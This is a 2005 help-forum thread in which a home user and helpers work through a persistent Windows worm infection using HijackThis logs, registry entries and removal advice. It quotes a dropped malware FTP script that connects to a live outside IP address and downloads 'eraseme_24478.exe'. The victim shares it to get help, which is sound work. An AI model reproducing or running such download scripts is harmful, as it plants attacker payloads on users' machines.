A network virus that just won't quit [HijackThis Log]

I have a LAN with 7 boxes on it now. My office has 5

1 xp home
2 fbsd
1 linux rh 9
1 mac os 9

and there are two in other rooms of the house my kids use which I suspect is where the trouble began. They're both running xp home also, and I've been fighting this bug for months now. Hoping maybe to finally get it the (*&#%%#@ off my network.

I have noticed veritas.exe running, files TFTPnnnn.exe's showing up on my system folder e.g.

Directory of C:\WINDOWS\system32

09/03/2002 12:06 PM 16,896 tftp.exe
03/22/2005 11:51 AM 0 TFTP2544
03/21/2005 07:00 PM 0 TFTP3764

and Eudora freezing and crashing. My system is unstable, my bandwidth gets chewed up, and I've had to shut down voluntarily when leaving my desk because otherwise the things frozen and I have to shut down by holding down the power switch when I get back.

Am running an up to date AVG, which found and clobbered an IRC bot earlier today, and SpyBot S&D which reports the following DSO exploit - which after I remove it reports doing so but keeps coming back..


--- Search result list ---
DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-21-117609710-796845957-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3


Where do I go from here?

Marty

 

follow up to hard infection trouble

I've followed the instructions as Arie directed and posted my HijackThis log below. The one that I wonder if it's suspicious is

HKLM\System\CCS\Services\Tcpip\..\{4CD92CBE-03C9-4D9B-8C9F-07011061D61C}: NameServer = 206.72.209.27 206.72.209.56

Right now things seem to be working ok, but I'll know better in an hour or so when I get back and see if Eudora is still running and my system hasn't frozen up. Will post back at that time.

Thanks, don't know what I'd do without you folks.

Marty

--------------------------------------------

Logfile of HijackThis v1.99.1
Scan saved at 11:56:44 AM, on 3/23/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\alg.exe
E:\local\Apache\Apache2\bin\Apache.exe
F:\PROGRA~1\Security\AVG\avgamsvr.exe
F:\PROGRA~1\Security\AVG\avgupsvc.exe
C:\WINDOWS\System32\svchost.exe
E:\local\Apache\Apache2\bin\Apache.exe
C:\WINDOWS\Explorer.EXE
F:\PROGRA~1\Security\AVG\avgcc.exe
F:\PROGRA~1\Security\AVG\avgemc.exe
E:\local\Apache\Apache2\bin\ApacheMonitor.exe
D:\Apps\Eudora\Eudora.exe
C:\Documents and Settings\Owner\Desktop\hijackthis\HijackThis.exe

O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [AVG7_CC] F:\PROGRA~1\Security\AVG\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [AVG7_EMC] F:\PROGRA~1\Security\AVG\avgemc.exe
O4 - HKLM\..\Run: [AutoVirusProtection] ciscv.exe
O4 - HKLM\..\RunServices: [AutoVirusProtection] ciscv.exe
O4 - Global Startup: Monitor Apache Servers.lnk = E:\local\Apache\Apache2\bin\ApacheMonitor.exe
O16 - DPF: {80DD2229-B8E4-4C77-B72F-F22972D723EA} (AvxScanOnline Control) - http://www.bitdefender.com/scan/Msie/bitdefender.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoftware.com/activescan/as5/asinst.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{4CD92CBE-03C9-4D9B-8C9F-07011061D61C}: NameServer = 206.72.209.27 206.72.209.56
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
O23 - Service: Apache2 - Unknown owner - E:\local\Apache\Apache2\bin\Apache.exe" -k runservice (file missing)
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - F:\PROGRA~1\Security\AVG\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - F:\PROGRA~1\Security\AVG\avgupsvc.exe

 

not fixed

Ok, Eudora froze up on me minutes after posting. Is it that nameserver in my registry that HijackThis reported?

Marty

 

About your nameserver, it appears to be your internet access providor.

The below are your problem, believe me that these aren't AVG files.

O4 - HKLM\..\Run: [AutoVirusProtection] ciscv.exe
O4 - HKLM\..\RunServices: [AutoVirusProtection] ciscv.exe

But you should get Killbox, and use it to terminate it before removal of the lines.

It would be a good idea to install SP2 for XP.

 

Hi Mark,

Thanks to the folks on this BBS I may be getting somewhere. First, I've removed the following from my registry entirely, and also from my HD:

veritas.exe
mspn.exe
mspn32.exe
ciscv.exe

Since none of these were running according to Security Task Mgr v1.6e or IARSN TaskInfo v6,0,1,134 I had nothing to do afaik with Killbox, though I've now got it on my box.

Can you tell me what's been on my box, and if I might still have it?


Marty

[Current] Logfile of HijackThis v1.99.1
Scan saved at 10:15:51 AM, on 3/24/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\alg.exe
E:\local\Apache\Apache2\bin\Apache.exe
F:\PROGRA~1\Security\AVG\avgamsvr.exe
F:\PROGRA~1\Security\AVG\avgupsvc.exe
C:\WINDOWS\System32\svchost.exe
E:\local\Apache\Apache2\bin\Apache.exe
C:\WINDOWS\Explorer.EXE
F:\PROGRA~1\Security\AVG\avgcc.exe
F:\PROGRA~1\Security\AVG\avgemc.exe
E:\local\Apache\Apache2\bin\ApacheMonitor.exe
D:\Apps\Eudora\Eudora.exe
D:\APPS\FIREFOX\FIREFOX.EXE
C:\DOCUMENTS AND SETTINGS\OWNER\DESKTOP\KillBox.exe
F:\Maint\HijackThis.exe
D:\Apps\Textpad\TextPad.exe

O4 - HKLM\..\Run: [AVG7_CC] F:\PROGRA~1\Security\AVG\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [AVG7_EMC] F:\PROGRA~1\Security\AVG\avgemc.exe
O4 - Global Startup: Monitor Apache Servers.lnk = E:\local\Apache\Apache2\bin\ApacheMonitor.exe
O16 - DPF: {80DD2229-B8E4-4C77-B72F-F22972D723EA} (AvxScanOnline Control) - http://www.bitdefender.com/scan/Msie/bitdefender.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoftware.com/activescan/as5/asinst.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{4CD92CBE-03C9-4D9B-8C9F-07011061D61C}: NameServer = 206.72.209.27 206.72.209.56
O23 - Service: Apache2 - Unknown owner - E:\local\Apache\Apache2\bin\Apache.exe" -k runservice (file missing)
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - F:\PROGRA~1\Security\AVG\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - F:\PROGRA~1\Security\AVG\avgupsvc.exe

 

Generic Host Process still crashing

Don't know if this is part of my old problem, othewise my system has been quite stable the last few hours.

The popup says

"Generic Host Process for Win32 Services has encountered a problem and needs to close. We are sorry for the inconvenience. "

Here's a new HiJackThis log:

Logfile of HijackThis v1.99.1
Scan saved at 11:54:25 AM, on 3/24/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\alg.exe
E:\local\Apache\Apache2\bin\Apache.exe
F:\PROGRA~1\Security\AVG\avgamsvr.exe
F:\PROGRA~1\Security\AVG\avgupsvc.exe
C:\WINDOWS\System32\svchost.exe
E:\local\Apache\Apache2\bin\Apache.exe
C:\WINDOWS\Explorer.EXE
F:\PROGRA~1\Security\AVG\avgcc.exe
F:\PROGRA~1\Security\AVG\avgemc.exe
E:\local\Apache\Apache2\bin\ApacheMonitor.exe
D:\Apps\Eudora\Eudora.exe
D:\APPS\FIREFOX\FIREFOX.EXE
D:\Apps\Textpad\TextPad.exe
D:\Apps\TaskInfo 6.x\TaskInfo.exe
C:\WINDOWS\System32\dwwin.exe
F:\Maint\HijackThis.exe

O4 - HKLM\..\Run: [AVG7_CC] F:\PROGRA~1\Security\AVG\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [AVG7_EMC] F:\PROGRA~1\Security\AVG\avgemc.exe
O4 - Global Startup: Monitor Apache Servers.lnk = E:\local\Apache\Apache2\bin\ApacheMonitor.exe
O16 - DPF: {80DD2229-B8E4-4C77-B72F-F22972D723EA} (AvxScanOnline Control) - http://www.bitdefender.com/scan/Msie/bitdefender.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoftware.com/activescan/as5/asinst.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{4CD92CBE-03C9-4D9B-8C9F-07011061D61C}: NameServer = 206.72.209.27 206.72.209.56
O23 - Service: Apache2 - Unknown owner - E:\local\Apache\Apache2\bin\Apache.exe" -k runservice (file missing)
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - F:\PROGRA~1\Security\AVG\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - F:\PROGRA~1\Security\AVG\avgupsvc.exe

 

hard bug to remove

I posted previously http://www.windowsbbs.com/showthread.php?p=229821#post229821
but this is still a problem.

My symptom now is that my computer will freeze up after a while. I also notice something called TFTPnnnn.exe showing up on my C:\WINDOWS\system32 folder, sometimes it's 0 bytes, sometimes it's actually got something in it.

Have followed the procedures Arie referred me to on that previous post, and my latest runs showed nothing questionable.

Marty

 

Hi Marty,

You really should have stuck with the original thread, but.........

Go here, skip the details and run the tool. Then go directly to Windows Update and install all critical updates offered (choose the Express Install). Reboot when prompted and go back as many times as necessary to have no more offered.

Below is info for the entry you inquired about.

O17 - HKLM\System\CCS\Services\Tcpip\..\{4CD92CBE-03C9-4D9B-8C9F-07011061D61C}: NameServer = 206.72.209.27 206.72.209.56

OrgName: ComputerWorks, Inc.
OrgID: COMPUT-105
Address: 11 North Pearl St.
City: Albany
StateProv: NY
PostalCode: 12207
Country: US

Your ISP?

Incidentally, this entry

O23 - Service: Apache2 - Unknown owner - E:\local\Apache\Apache2\bin\Apache.exe" -k runservice (file missing)

shows the file missing for the Apache service. You may consider re-installing.

Let us know how things are when done.

 

I merged the two threads.
You may find out which service has done that by right clicking My Computer and select Manage. Then see what the System log, under the Event Viewer can tell you.


BTW, about the DSO exploits, that is not uncommon for Spybot to do that.

 

Will follow the advice from Noah but right am under a deadline, which has been exacerbated by these problems.

I have, believe it or not been running stable and smooth all day long. First time in weeks. But the party's not over apparently.

Yesterday I removed tftp.exe and cache.exe from my system32 folder... and assume that's what has made the difference.

But... as I've gotten into the habit of looking for new stuff written onto system32 by "the gremlins ", just found a little file called 'i' - which I removed. Here's what's in the file:

-------------------------


open 160.78.90.10 14920
user 1 1
get eraseme_24478.exe
quit


-------------------------

I did a tracert of the ip addr and the last hops are

-------------------------


14 304 ms 323 ms 311 ms pal6-pal7-racc1.pal.seabone.net [195.22.218.227]

15 311 ms 311 ms 317 ms customer-side-garr-1-it-pal6.pal.seabone.net [19
5.22.218.102]
16 320 ms 629 ms 329 ms rt-ct1-rt-na1.na1.garr.net [193.206.134.9]
17 2543 ms 1661 ms 323 ms rt-na1-rt-ba1.ba1.garr.net [193.206.134.38]
18 1409 ms 569 ms 323 ms rt-ba1-rt-bo1.bo1.garr.net [193.206.134.77]
19 323 ms 419 ms 917 ms rt1-bo1-ru-unipr.bo1.garr.net [193.206.128.94]
20 912 ms 329 ms 329 ms 160.78.253.253
21 335 ms 377 ms 353 ms 160.78.254.251
22 3370 ms 332 ms 330 ms 160.78.90.10

Trace complete.


-----------------------------------------

Da, or nyet?


Marty

 

http://www.dnsstuff.com/tools/whois.ch?ip=160.78.90.10

 

Noah,

The version with email addy's in says

To notify abuse mailto: cert@garr.it

Should I write them and send a copy of the file? Anyone seen this type of file before? What's going on, and how long before my computer's not mine again?

Marty